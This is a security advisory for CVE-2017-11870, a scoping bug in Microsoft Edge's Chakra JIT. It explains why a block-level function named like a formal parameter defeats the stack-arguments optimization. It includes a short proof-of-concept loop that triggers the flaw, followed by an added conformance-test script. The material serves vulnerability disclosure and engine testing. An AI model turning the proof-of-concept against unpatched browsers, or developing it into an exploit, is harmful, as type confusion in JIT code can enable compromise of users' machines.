
Microsoft Edge Chakra JIT Incorrect Function Declaration Scope

Posted on 25 November 2017

Microsoft Edge: Chakra: JIT: Incorrect function declaration scope

CVE-2017-11870

In the following JavaScript code, when f is called without an argument both print calls must print out "undefined", because "x" is a formal parameter: in sloppy mode a function declared inside a block is hoisted to function scope (Annex B.3.3) only when its name is not also a parameter name, so the block-level "x" must not replace the formal. In Chakra, however, the second print call prints out "function x() { }", i.e. the block-level declaration overwrites the formal. This bug may lead to type confusion in JITed code.

    function f(x) {
        print(x);
        {
            function x() { }
        }
        print(x);
    }

The following code in "PreVisitFunction" decides whether the arguments object can be kept on the stack (the stack-arguments optimization):

    bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());

"HasAnyWriteToFormals", set by "Parser::BindPidRefsInScope", returns true for the following code, where "x" is a formal:

    function f(x) {
        x = 1;
    }

But the method does not detect the write to "x" that the buggy case above performs, so the optimization is wrongly applied to a function whose formal is written.

PoC:

    function f(x) {
        arguments;
        {
            function x() { }
        }
    }

    for (let i = 0; i < 10000; i++)
        f();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt
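The scoping rule the report relies on, and the reason writes to formals matter to the stack-arguments optimization, as an added example that is not part of lokihardt's report or of the Chakra code base. It is a small conformance check to run against a JavaScript engine: the expected values are the spec's (Annex B.3.3 parameter-name exception, mapped arguments object), so a correct engine returns conformant: true and the buggy Chakra build would not. The functions are built with the Function constructor so they run in sloppy mode however the file is loaded; the names conformanceReport and stressBlockDeclShape are this example's own.

```javascript
// Added example, not from the Project Zero report or from Chakra: a conformance
// check for the block-function scoping rule and for mapped arguments.
// The Function constructor yields sloppy-mode functions regardless of how this
// file is loaded (a module would otherwise force strict mode).

// The report's shape: a block-level function whose name is also a formal.
// Annex B.3.3 skips var-scope hoisting for parameter names, so after the block
// x must still be the parameter and arguments[0] must still mirror it.
const blockFuncNamedLikeParam = new Function("x", `
  const before = typeof x;
  { function x() {} }
  return { before, after: typeof x, argsMirrorsParam: arguments[0] === x };
`);

// Same block function, but its name is not a parameter: Annex B.3.3 does hoist
// it, so it is visible (as a function) after the block.
const blockFuncHoisted = new Function("y", `
  const before = typeof x;   // var-style binding exists but is not yet assigned
  { function x() {} }
  return { before, after: typeof x };
`);

// Strict mode: no Annex B hoisting at all; the declaration is block-scoped only.
const blockFuncStrict = new Function("y", `
  "use strict";
  { function x() {} }
  return typeof x;
`);

// Why HasAnyWriteToFormals matters: in sloppy mode the arguments object is
// mapped to the formals, so a write to x must be visible through arguments[0]
// and vice versa. An engine that keeps arguments on the stack has to know that
// such writes can happen, which is exactly what the bug hides from it.
const writeToFormal = new Function("x", `
  x = 1;
  const seenThroughArguments = arguments[0];
  arguments[0] = 2;
  return { seenThroughArguments, seenThroughFormal: x };
`);

function conformanceReport() {
  const report = {
    noArg: blockFuncNamedLikeParam(),     // the report's case: f() with no argument
    withArg: blockFuncNamedLikeParam(7),
    hoisted: blockFuncHoisted(),
    strict: blockFuncStrict(),
    mapped: writeToFormal(0),
  };
  report.conformant =
    report.noArg.before === "undefined" && report.noArg.after === "undefined" &&
    report.noArg.argsMirrorsParam &&
    report.withArg.before === "number" && report.withArg.after === "number" &&
    report.withArg.argsMirrorsParam &&
    report.hoisted.before === "undefined" && report.hoisted.after === "function" &&
    report.strict === "undefined" &&
    report.mapped.seenThroughArguments === 1 && report.mapped.seenThroughFormal === 2;
  return report;
}

// Mirrors the PoC's hot loop: the same shape run enough times to reach the JIT
// tiers. Returns false if any iteration sees x change after the block.
function stressBlockDeclShape(iterations = 10000) {
  for (let i = 0; i < iterations; i++) {
    const r = blockFuncNamedLikeParam(i);
    if (r.after !== "number" || !r.argsMirrorsParam) return false;
  }
  return true;
}

console.log(JSON.stringify(conformanceReport(), null, 2));
console.log("stress:", stressBlockDeclShape());
```

Run it under the engine you want to check (for example node); the stress loop matters because the report's defect is in the JIT path, so a result that holds only in the interpreter tier would be incomplete.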

 
